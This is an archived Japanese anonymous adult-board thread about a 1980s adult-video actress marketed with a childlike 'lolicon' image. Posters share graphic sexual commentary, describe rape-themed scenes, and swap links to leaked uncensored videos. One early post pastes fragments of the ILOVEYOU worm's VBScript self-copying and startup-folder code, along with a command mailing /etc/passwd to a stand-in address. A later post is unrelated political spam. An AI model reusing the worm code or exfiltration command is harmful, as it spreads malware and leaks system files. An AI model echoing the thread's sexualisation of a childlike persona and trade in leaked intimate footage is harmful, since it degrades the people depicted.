【マニア?】森村あすか【ロリコン?】
■ このスレッドは過去ログ倉庫に格納されています
伝説のロリコン、貧乳森村あすか 古すぎてわからないやつはスルーで >>1 あれくらいあれば貧乳とはいわないと思うが? それよりも、森村あすかといえばあの土手高。 胸よりも股間。 入れたくて入れたくて入れたくて……あぁ……タマラン!……って感じでした。 男優たちが羨ましかった。 顔だってタイプでした。 下血少女ってこのコだっけ?モ娘。の久住に似てるな。 正真正銘、彼女の描いた漫画 ttp://www.pureadult.co.jp/cgi_local/detail.cgi?id=126026434001&whdb= 「ぬるぬるオタッキー」でも漫画を描いていた 正直上手いとは思えないレベルだった >>8 「ホット・グリップ とことんセーラー服」で繰り返し抜いた 懐かしいね ショートカット&セーラー服が堪らんかった。 でも、デビュー時のプロフィールが神奈川出身だったのに 途中から岩手出身に変わって(戻って?)いたのが なんとなくワロタ 俺は髪長い時のが好きなんだよなー。 ウラ流出のヤツはたまらんかった。 うす〜い陰毛がまたタマラン。 c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") cat /etc/passwd | mail nobody@nonexistent.com If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l" Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1) fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\" fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\" If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l" >>2 森村あすかスレでは必ず歯槽膿漏云々の話題がでるが、歯槽膿漏ではなく、膿栓ができやすかったのではないかと推測してみる。 ショートカットレジェンドベスト10・・・・レジェンド入賞おめ 1 1988 松本まりな 2 1992 黛ミキ 3 1993 有森麗 4 1993 氷高小夜 5 1989 森村あすか 6 1993 美里真理 7 1991 伊藤真紀 8 1989 小森愛 9 1987 墨田ユキ 10 1990 上村ケイ 歌もうたってたなぁ…昔某ホテルのディナーショーに売れてない演歌歌手と一緒に来て何か歌ってたけど、どんな歌だったか記憶にない… 帰りに握手したのは覚えてる。弟は、昔よく家に遊びに来てた >>21 ディナーショーいいなあー。しかも握手まで!教えてくれれば行ったのに…。 歌は「ゴメンネ〜ッ!!」と「そよ風にのって」ではないかと…。 弟さんがいるのはマドンナメイトカセットの中でチラッと言ってましたね。似てました? >>20 タイトル覚えてますか?「制服狩り」と予想。 初めて見たアダルトビデオの作品が森村あすかのでした。制服モノで、自分の初体験の参考にした 前に付き合ってた彼女が森村あすかにそっくりでした。 森村あすかが熟女モノでふっかつしてほしいですなぁ。 >>32 たぶんそう。もっとでてほしいな。特にショートカットになってからの。 >>29 あすかちゃんて死んだのぉ? あの見ていてヘタクソなフェラがいいよね!いかにも素人っぽい。 たぶんそう。それでも初期〜中期はそれなりに見れるけど、後期はかなりやっつけな感じがする。 >>35 さんの言うように「制服狩り」が一番いい。あとは「悶絶パーティー」と「視姦」あたりが好きです。 _____ /_____ \=@ //⌒ヽ ⌒ヽ `\ |/⌒ヽ ⌒ヽヽ | ヽ / | ^ |^ |- 、 ヽ | / | ヽ |─| l // `ー ●ーU′ \ ヽ / ー ヘ ー ′ ´^V / ─ | ─ ヽ i l \ / _丿 i 二 | 二 | | . \ ` ー ´ / .l \ | / l ! >ー── く ヽ \ | / / / / |/\/ \ ヽ  ̄ ̄ ̄ / / 同じスレではこのままだけど l l | l >━━6━━━━━く 違うスレにコピペするとドラえもんがスネ夫 ヽ、| | ノ / く / ヽ に変わる不思議なコピペ。 |ー───j l (⌒(⌒) 「制服狩り」は今でもビデオテープで持ってる。たまに見るけど あすかちゃんのオナニーシーンが最高。 巨乳好きの俺がヌイた唯一の女優でした。 制服狩り最高!!! 弟はあんまり似てないような… 「姉ちゃんは東京で森村あすかって名でラジオDJやってる」って聞いてたが、後々元AVだと知った そうそう「いい金づるだ」って言ってたときの あすかちゃんの泣きの演技は見事! 高田馬場のビデオレンタルで握手&サイン会へ行ったなあ。 途中で客のヤクザが急に怒り出して大暴れした。 あすかちゃ〜ん。 熟女物で復活してくれ〜。わしが相手してやるよ〜ん。 ズバリタイトル「あすかのお口で思想早漏」このタイトルなら売れるぞ! あすかちゃん。復活して。お願い! 復活しなくてもいいから、当時のビデオを全部DVD化してほしい。 懐かしいな。 何年か前にマドンナメイトカセットの音源をmp3化してうpした覚えが…。 もう新基準なんて贅沢は言わん なんでもいいからDVD出してくれ! Q 好みの女性のタイプは? 大人っぽい人 好きな女性のタイプ 気の強い人 好きな女性のタイプ 気の強い人 好きな女性のタイプは、ハッキリしている人で気の強い人 「I LOVE 森村あすか」って、 もう入手した人いますか? 内容がいまだにわからないんだけど・・・。 復刻版はいらん。当時のあの撮り方の下手なAVはいらんで! やはりネチネチの熟女モノだ!売れるぞ! 森村あすか、日向まこ、岬まどかのロリコン3人が熟女となった復帰版を 望む!みたいよぉ〜〜〜〜〜〜。 復刻版はいらね、復帰版だぁ! 「I LOVE 森村あすか」 元タイトルはわからないが、「死霊のはらわた」や 「サイコ」をモチーフにしたパロディタッチの作品の 単品再録。 画質はイマイチで、露出度も控えめ。モザイクも厳重。 森村あすかのDVD自体が稀少だから、彼女の 画像ならとりあえず置いておきたいという方なら 良いかも知れないが、「美少女REAL」や「制服狩り」の レベルを期待したら卓袱台をひっくり返したくなるぞ。 せめて、良作の2,3本も抱き合わせ収録せんか!ゴラァ! >>71 補足 パッケージをよく見たら 元作品は「放射能汚染8」だった。 >>74 裏でも表でも、普通AVならち○ぽってしゃぶってるだろ。 裏は以下の2本持ってるけど、ほかにもあったら教えてください TokyoAngel-SexualAttraction [逆輸入] 森村あすか(TipTop).mpg 森村あすか 淫乱風暴(燃えるあすかちゃんの流出).mpg 森村あすかあたりの時代で他にも貧乳AV女優だれかしりませんか? 顔は覚えてるんだけど名前しらない。 近親相姦の変態家族系のビデオにでてて髪は二つ結びだったんだけど、、、 だれか知ってる人いたら教えてください〜 制服狩りって、どんな内容ですか?女の子二人出演してましたか?! 征服狩りは、あすかがカトリック系の生徒の役で、最後に騙されたのが わかり・・。2人で出てたのは校内写生が椎名と出てたと思う。 >>81 2人出てたのは他に ホットグリップで杉森久美子と フェラーレンスで桂木麻也子と 出血大制服でレズのおねえちゃんと 出てたのがある。 ただ、桂木とのカラミはなかったと思う ホットグリップって最初に私服姿でレイプされてから白セーラーで3Pで本気に感じながら 顔謝口内発射でドロドロになるヤツじゃなかったかな? ラストシーンのカメラに向かってレンズを手で隠そうとする時の泣き腫らした虚ろな目に 興奮しまくった記憶があるぞ >>84 84の指してるビデオが何かはわからないが ホットグリップがその内容じゃないことはわかる。 ホットグリップはテニスしててボールが人の家に入ってしまって それを取りに行った杉森が捕まって、 帰ってこないのを心配した森村あすかも家の中入っていって 二人ともやられちゃう話だ。 ラストシーンは笑いながら布団の羽だか風船だかを飛ばしてるシーンだったはず。 >84 それって、悶絶パーティーでない? 欲しいけど、あっても高いんだよね〜。 DVD化して欲しい。 あすかちゃんの作品はDVDになってるのが少ないね いくつか持ってるけど有名なモノじゃない。「燃えるあすかちゃん」とか出ないかな? “目指せ、バルセロナ〜!” 「冒険してもいい頃」に声優として 出てたけど、森村あすかの声はやっぱ萌えるなあ。 ヒロイン役でエロいシーンはほとんどなかったけど 共演の豊丸や藤沢まりののエロ芝居よりも あのロリ声が今も耳に残る。 美少女REALってどんな内容か 覚えている人いる? shareにある裏流出したのはそれ?髪が長くなってからこれのみ本番で短いころは議事だった でしょうか >>96 ・インタビュー ・ホテルでのゲリラ撮影(画面暗い) (脱衣→男優と洗いっこ→ベッドでからみ) ・インタビューしていた茶店のような場所から 二階へ上がると、ベッドルームで 男優(ブリーフ1枚)が待機 ・下着姿になって男優とペッティング。 その途中で脱がされ、挿入のないまま一度絶頂。 ・休憩後、男優2人と3Pで散々遊ばれる。 ・最後に、男優の一人が挿入→フィニッシュ >>98 まじで本番やってんの?全然期待してなかったんだが 12月18日にDVD 「Legend Special 27 森村あすか」 が発売されます。 収録作品は 「JUST ONLY YOU」 「極上の上」 「放射能汚染 PART08」です。 ファンだった人は買いかな? タイトル失念しちゃってるんだけど、まだ髪が長い頃の作品で 3Pしてるんだけど、四つん這いで、背後から突かれ 口でチンコをくわえてるんだけど 口内射精するのね。ずっと偽精液だと思ってたわけ。 そしたら裏見たら、ちゃんとチンコから口に精液が入ってるじゃありませんか! バックから突かれながら、口からダラダラ垂らす精液は本物だったのです。これには驚いた。 あれって、確かに本物にも見えるんだけどカット割りとか考えるとかなり怪しい。あの情け無い偽本番 っぷりからすると仕込みの可能性大じゃないか?それよりビデオの始めの方で男優の巨チンしごいて るあたりが俺的にはGJ。 コンビニで雑誌を立ち読みしてたら 森村あすかの事が書いてあった。 アニメーターと結婚したんだそうな。 うらやましい。けど生活大変だろうな。アニメーターじゃ。 森村あすかが制服着てる画像ってあんまり見かけないな。 裸のばっかり。 地元のビデオ屋には、ホットグリップと制服狩りが未だにレンタルされている… 110番通報 \ ::::: \ \::::: \ \::::: _ヽ __ _ ヽ/, /_ ヽ/、 ヽ_ // /< __) l -,|__) > || | < __)_ゝJ_)_> \ ||.| < ___)_(_)_ > \| | <____ノ_(_)_ ) ヾヽニニ/ー--'/ |_|_t_|_♀__| 9 ∂ 6 ∂ (9_∂ 最近発売されたDVD買った人いるかな? よければ感想を聞かせてほしいです この子本当にロリ好きにはたまらない子だったね 熟女になってからの姿も是非見てみたいわ 森村あすかがオナニーしてるビデオってある? どうも彼女がオナニーしてる印象が無いんだよね〜。 大阪プロレスを旗揚げしたスペル・デルフィンと結婚した早坂好恵に似てるんだが、 他に気がついてた人いる? 無修正見たんだ。3Pのやつ。 しっかり擬似だったんだ。挿入と思わせて土手こすりでChinko突き抜けてたし。 (;゚Д゚)クワッ バックで突かれ(るフリし)ながらフェラ→口内発射のシーンも、フェラしてるChinkoにはゴムが装着されてたんだ。 どっから精子が出たのか謎なんだ。 悪の組織ナゾーもビックリなんだ。 でも、森村嬢の無修正だから、とりあえず満足できたんだ。 おわり。 >124 タイトル教えて。 ビラビラやクリクリは見えた? >>125 「森村あすか 無修正」でググったらなんなっと出てくると思うよ。 一応、「森村あすか 昔の裏ビデオ イッて乱れて」でググったら確実なはず。 22分で500円とは安いと思ったけど 送料が1500円もするんじゃん。高っ! >125 “ゴング・ホウ60”っていう学園スポ根仕立てのやつの流出ものもあるよ。 >131 破損した動画ファイルで持ってた! プレーヤーによってはうまく再生できた!!! この子とセックスできた男優が羨ましい まさに古きよき時代のロリコンアイドルだよね 今付き合ってるオバハンが結構こんな体形なので満足している 良くは無いけど味のある体型だよな 最近の改造人間よりずっとマシ 文庫本サイズくらいの写真集があったよね?あれが欲しい。 声だけで抜ける。昔マドンナメイドカセットを持ってたが。 もし今あれば一万でも出すのに! あるよ、でも今オクに出すと俺ってバレるなw みんなが忘れた頃、ここのレスが950を過ぎたあたりで出品するか 良いと思ったのは、マドンナメイトだったかな?渚友紀ともう1人だれかの共演で あすかが眼鏡っ娘の作品。タイトル忘れた。 >>149 950って… 4年半かけて150だから、このままだと26年くらいかかるぞw 逆に脳が死んでもアッチは元気ってのも悲しいが・・・。 リアルナースの妹が話してたボケ老人院内レイプ事件を思い出したw このアニメ声は電話でのエッチに向いていると思います。 耳元で囁かれたり喘がれたりすると… 即イキ! 天然だよ。 だから由美かおると同じでヘアヌード写真集が出せないタイプ。 だって具が見えちゃうからw あれだけ可愛かったのだから、今でも可愛いと信じている 20数年前はすっげぇ可愛かった娘に街で声をかけれたが 誰だか判別不能なほど劣化が進んでて相手にわかるくらい動揺しちまった 現実なんてそんなもんよ 「制服狩り」 あすかがオナニーの最中、男が侵入してきて ヤラれちゃうんだよね LDもってるけど観れない... >>167 どうぞ買ってください。 ttp://ppv.videoboy.tv/product/p100002916.html 個人的な思い出の 悶絶パーティ と 見たかったけど借りる前にレンタル屋がつぶれた 出血大制服4 がみたい あと、ブルマーやスク水のものが在ったら見たいな・・・ でも、いまさら無理だよね。 【夢】 小沢奈美と森村あすかとの3P! 2人ともロリっぽいが実はかなり色っぽい。最後は2人の顔に大放出で決まり! >>165 が何を言いたいのか全く解らない 池沼かな 掃除していたらマドンナメイトの本とカセットが出てきた この子の全盛期の可愛らしさは、モー娘やAKBの可愛らしさの平均値より はるかに高かかったと思う。異論は認めない。 >>183 180ですけどマジなんだ!何とかセットで1万円くらいで売ってくれないか!? オクで両方合わせても2kもあれば落札できるだろ 本だけなら300円くらいだ もしも活躍してるのが今だったら絶対みひろのように志村けんに可愛がわれてると思います。 >>192 みひろタンはモザイク越しでも真っ黒なのがわかるので嫌です。 Amazonでマドンナメイドカセット買おうと思ったら在庫なく買えない。誰か五千円で売ってくれ!! 持ってるし要らないから売ってもいいよ だけどここでの受け渡しは危険だからヤフオクに出す予定 今すぐだと特定されるから10年以内とだけ言っておくよ ねっちっこく責めながら思いっきりヤらしい言葉を言わせたいね。 昨日の夢に出て来てセクスした。 バックで責め続けて最後は口に出した。でも少し顔にもかかってエロかった。 『制服狩り』と『燃えるあすかちゃん』 のDVD化を希望。しかも新規順モザイクで。 悶絶パーティと出血大制服お願い。 あとタイトル忘れたけど、ブルマはいてた奴。 「ホットグリップ」がいいな 共演の杉原久美子と二人してセーラー服姿で 日比野に犯されるシーンは 今でもヌケル レジェンドシリーズが出てるけど、このモザイクは昔と同じ濃いモザイクなの? 杉原久美子! 懐かしい! 売れなかった女優だけど、エロ本を買い始めたときに載っていた女優なので、よく覚えてる。 今も元気ならオバチャンだろうがw それはそれで萌えそうな気がするんだ 堀ちえみとか5人も子供産んであの程度の劣化だから 童顔系は劣化が少ないかも? >>210 「ホットグリップ」はAV屈指の名作だと思う 小森愛が復活したんだから あすかも復活せんかの・・・ 「制服狩り」 LDのジャケサイズでは あすかの制服姿に萌える 中身が観れないが... この人、天然パーマなのかな、ショートは完璧超人だったけど 髪の長い画像見るとゴワゴワして微妙な感じだ >>235 歯槽膿漏は、キスしたくないためについた嘘だよ。 バズーカなんとかいうバカ男優がそれ信じて本に書いたんでひろまったけど。 ビデオ全部見たわけじゃないけど男優がほとんど軽いキスしかしてなかったから マジで臭いのかと思ってたよ、本人がキスしてって言ってても軽くしてたし 森村あすか自身がインタビューで答えてたから間違いないと思うよ。 バズーカなんとかじゃなくて、マグナム北斗だね。本書いた人。 「ホットグリップ」 セーラー服姿で犯られる杉原久美子でヌいている 復活させて今度こそはガチでハードなプレイでめちゃくちゃにしてほしいわ 今見てみるとそんなに可愛くないって言う人もいるけど あの時代独特の真面目な雰囲気と顔立ちはやっぱり特別なものがある ルックスだけなら今の方が可愛い娘が多いが 今時の娘は全身からビッチ臭を放っているのが嫌 >>249-252 あんた方とは美味い酒が飲めそうだ むかし何の雑誌か忘れたけど、 AV男優の座談会(チョコボールとか含む)で、 森村あすかが歯槽膿漏で口が臭いと参加者の一人が言っていた。 村上麗奈のアソコも臭かったとか爆弾発言連発で面白かった。 誰か何の雑誌か覚えているひといないかな? >>254 その発言者って、マグナム北斗だろ? 森村あすかが、キスが嫌で言った嘘をそのまま信じて本に書いたバカ。 どうなんだろうね、それも森村ファンが信じているだけかも知れんし まあ、今となってはどうでもよろし ハードなキスする男優が全くいなかったのも事実 まあ、今となってはどうでもよろし 昔は肌が綺麗な娘が多かったが、最近の娘は肌が汚いのぉ 早い時期から毒素(アルコール、ニコチン)を体内に取り込み過ぎなんじゃろうな 画面の中だけじゃなく現実を含めての話なんじゃがな(藁) まあ、確かにモチモチした肌の子は減った気がする 若い頃に脂肪少ないと肌老化早いだろうな あすかの胸は小ぶりだったけど あのモチモチ感というかプニプニ感が良かったね ttp://sakurasite.homeip.net/imgboard/img-box/img20120419223934.jpg ttp://sakurasite.homeip.net/imgboard/img-box/img20120420214154.jpg ttp://sakurasite.homeip.net/imgboard/img-box/img20120428192721.jpg ホットグリップで杉原久美子が犯されるシーンで、ガンシャするとき、なぜか ヘアにモザイクがかかってなかった ふと思ったがリアル浅倉南ちゃん(日高のり子)この娘に似てないか!? 顔といい声といい。この前テレビに出てたけど、いい年のとりかたしてた。つまり、あすかちゃんもいい感じで年をとってると思う。 若い頃も腹回りに肉が付いていたから 多少中年体型になっても違和感がないかもしれん 愚妻が結構こんな感じ 意外と劣化しないのだこれがw 小森の復活は残念な印象だったが あすかが復活したらイケルかもしれんな 「ホットグリップ」 セーラー服姿で犯られる杉森久美子でヌいている 杉森久美子 エロいよね ホットグリップはどちっちが主役か分からん CSで見たけど、お笑いウルトラクイズに出てたんだね 一般のテレビに出てたなんて知らなかった 杉森久美子はマイナーすぎるから、 復刻DVDは可能性ゼロに近いナ >>280 タカにやらせろって言われていたなw 松坂牛きみこも出ていた いい時代だわ 久し振りに「マドンナメイト写真集」のあすかで抜いた。 青春が蘇る感じ。 たしか演歌オヤジの舞台に端役で出演した事が有ったよね?コマスタだったかな。 コマスタは当たっていると思うけど、もしかしたら演歌オババだったかも。 この娘のマソコが見れる時代になるとは思わなかったよ 昔の自分に教えてあげたい ヌルヌルおたっきーってタイトル名が忘れられない 絵が得意なんだったっけ? 中身は見ずじまいだったが 「ホットグリップ」 セーラー服姿で犯られる杉森久美子でヌいている 熟女化した元ロリコンアイドル女優のハードプレイを見てみたい >.306 「君はステキ」しか知らないのだが、新しいのがあるの? 「お宝コレクション20 森村あすか&樹ますみ」を買おうかどうか迷ってるんですが、 このオムニバス版DVDについて知ってる人、誰かいますか? 森村あすかのどんな出演作品が収録されてるか分かると参考になるんですが。 >>321 持ってるぜw 権利が移った関係なのかタイトルやエンドがカットされてる パッケージ写真で解るだろうけどチャプターだけ書いとくわ 1.プロローグ 池袋かどこかのパルコ前と思しき付近で公衆電話かけたり 街をトテテテと歩いてたり 2.彼氏とのSEX そのまんま 3.オナニー 待ち合わせにすっぽかされて自宅でしてるところを覗かれる 4.私を満足させて! 平謝りの覗きとセックル 5.おもちゃでプレイ 彼氏とプレイしつつ覗きのことを思い出す >>322 とても詳しい説明をありがとう御座います, 本当に助かりました。 自分が保有してる彼女のAVを調べてみましたが、 公衆電話にかけるorおもちゃでプレイというシーンは見当たりませんでした。 やはり買うことにします。 森村あすかってそんなに人気があんの? ウィキペディアのアクセス数を調べてみたが stats.grok.se/ja/latest90/森村あすか%20(AV女優) 美里真里の半分程度 >>329 そもそも美里真里はデブ専だからジャンルが違う >>329 美里真里じゃなく美里真理 >>329 ウェスト58cm タイプ的には同じロリ系・スリムな北原ちあきに似てる。 毎度お騒がせします的なちょっとエロいドラマにたまに出てた > 北原ちあき 怒っておっぱい見せるシーンが記憶に残ってる 北原ちあきは偶然実物長々と見たけど全然ロリじゃなかったぞ グラビアよりすごく可愛かったけど >>124-127 その無修正動画は「花のあすか」でしょうか? 前スレに書かれていたので ttp://20646a50.blog117.fc2.com/blog-entry-16.html 突然お邪魔して失礼します。 AVブリッコ金賞「ピンクの下半身」というレアな作品は見たことないんですが http://www.pureadult.co.jp/script/detail_h.php?id=126040011000 (珍しく看護婦姿をしてます) これは撮り下ろし作品でしょうか?あるいは編集ものでしょうか? よく調べたら「内診カルテ」がありました。 ただ、他の女優と共演してる点が違うようで あゆみ翼ってなんとなく似てた ググると「中村あゆみの翼の折れたエンジェル」ばかり大量にヒットするがw 君はステキという無修正を見たのだが、あそこが見えるのは、男優がクンニしているほんの数秒間だけ しかも、男優の舌が不健康そうな紫色で萎える 顔つきは三崎奈美そっくりだな 森村あすかの性格ってどんなだったの? 真面目そうな顔してるけど割と遊び好きだったのかな >>106 そういえばなんかの雑誌で 漫画家を目指してる、というインタビュー記事読んだ記憶がある。 >>350 AV業界の元祖オタクアイドルで、今で言えばしょこたんのような性格。 おれも何かの雑誌で漫画家にってのを見たのが最後だったな 「ぬるぬるオタッキー」なんてタイトルの作品もあったなw >>347 知りたくなかったわ・・・・・・・・・・・・・・・・・・・・ あすかの写真集がヤフオクで意外に高値でワロタ 近所の古本屋で80円で売ってたわw インディアナ州共和党員「第二次大戦中トルーマン元大統領は日本に原爆落とすガッツがあったw」トランプ「そうだよ俺がその時大統領だったら絶対やってやるぜ!畜生、俺は日本を心から憎む!心から!心から憎む!心から!」 姫子9のレビュー記事で抜きまくった覚えがある。(厨房だったので) 一番いい時だろあれ。ショートカット好きになったきっかけだったかも。 このスレ見てから裏みたけど生尺してたのはビックリしたけど相変わらず入れてるところはガードだったわ 多分疑似だったんだろうな ほんとこの人のは具を見れないね いるよ この子 可愛かったな ショートカットは売れない 事務所に言われたかもだけど それからショートカットの元祖なのかな! ホットグリップのジャケ写はショートじゃなかったんだよな。 なのに本編ではショート。 >>369 まだ 昔はキャラクター作り とか1本あたりに時間かけられた いよいよ彼女も五十路か お元気でいることを願う あの声は今も変わらないのかな 今見てもかわいいし、声も。 もうちょい豊満ならな〜 元々声優志望でOVAで声優やれたから野望を果たして引退なら賢いか。アニメーターと結婚したの? >>370 本当かよ? 昔からAVなんか撮影二日間でパパッと済ましてただろ 単にジャケ写撮ってから事務所関係のいざこざで本編の撮影が止まってただけじゃないの? >>370 本当かよ? 昔からAVなんか撮影二日間でパパッと済ましてただろ 単にジャケ写撮ってから事務所関係のいざこざで本編の撮影が止まってただけじゃないの さて、雑誌の付録の等身大ポスターに全裸アタックの時間だ。 もういいお母さんだろうね。 きれいな人になってそう。 何かみんな結婚できて幸せになってると思いたがるね 男性優位社会のおかげで救済できるってか? 森村あすか ゆうちょで検索すると森村あすかと関わった人のブログが エクセスの作品は映像化されてないから見てみたかったんだが、 これどうやったら見れるかわかる? https://www.hmfhd.com/forum.php?mod=viewthread& ;tid=6023 もう20年位前だが裏ビデオ屋で買ったことがある。 当時は森村あすかの事を知らずジャケ写真で可愛さに一目惚れしての購入だった。 実際見たら擬似でまったく使い物にならなかったけど。 唯一よかったのが3Pのとき男優があすかの口に指を入れるシーンで、 口の中を弄くってる時にあすかの唾液がネチョ〜と糸引いたり、ロリッぽい顔で妙に生々しいアンバランスさに興奮した。 VHSだが裏とは思えないくらい画質がよくてそこまで見れたし、確かネットにもあがってたけどVHSより画質が悪かったな。 この子あたりから、AVからアイドルへ 壁が厚くダメだけど。 こんなスレがあったのか!この人大好きだった。誰か教えて欲しいんだけど 森村あすかが車運転しててどこかに友人と旅行行ってて後部座席で島袋浩と女がいちゃついてて 旅館みたいなとこでジェイソンみたいな仮面のやつが現れるめちゃくちゃな話だったけど これのタイトル思い出せなくて、知ってるよって人いますかね? それと、書いてる人いるけどホットグリップは好きだった一番好きだったのがこれ >>406 即レスありがとうございます。それかなあ?と検索したんですが情報少なすぎてわかりません ほんとに可愛い子だったのでまた観たいんですけどね、今見ても余裕でヌケル気がします いろいろ頑張って無料動画を探したけど制服狩り、フラッシュバック、キミはすてきしか見つからなかった。3つあれば十分かもだけどホットグリップ見つけたかったなー ■ このスレッドは過去ログ倉庫に格納されています
read.cgi ver 08.1h [pink] - 2023/09/20 Walang Kapalit ★ | uplift ★ 5ちゃんねる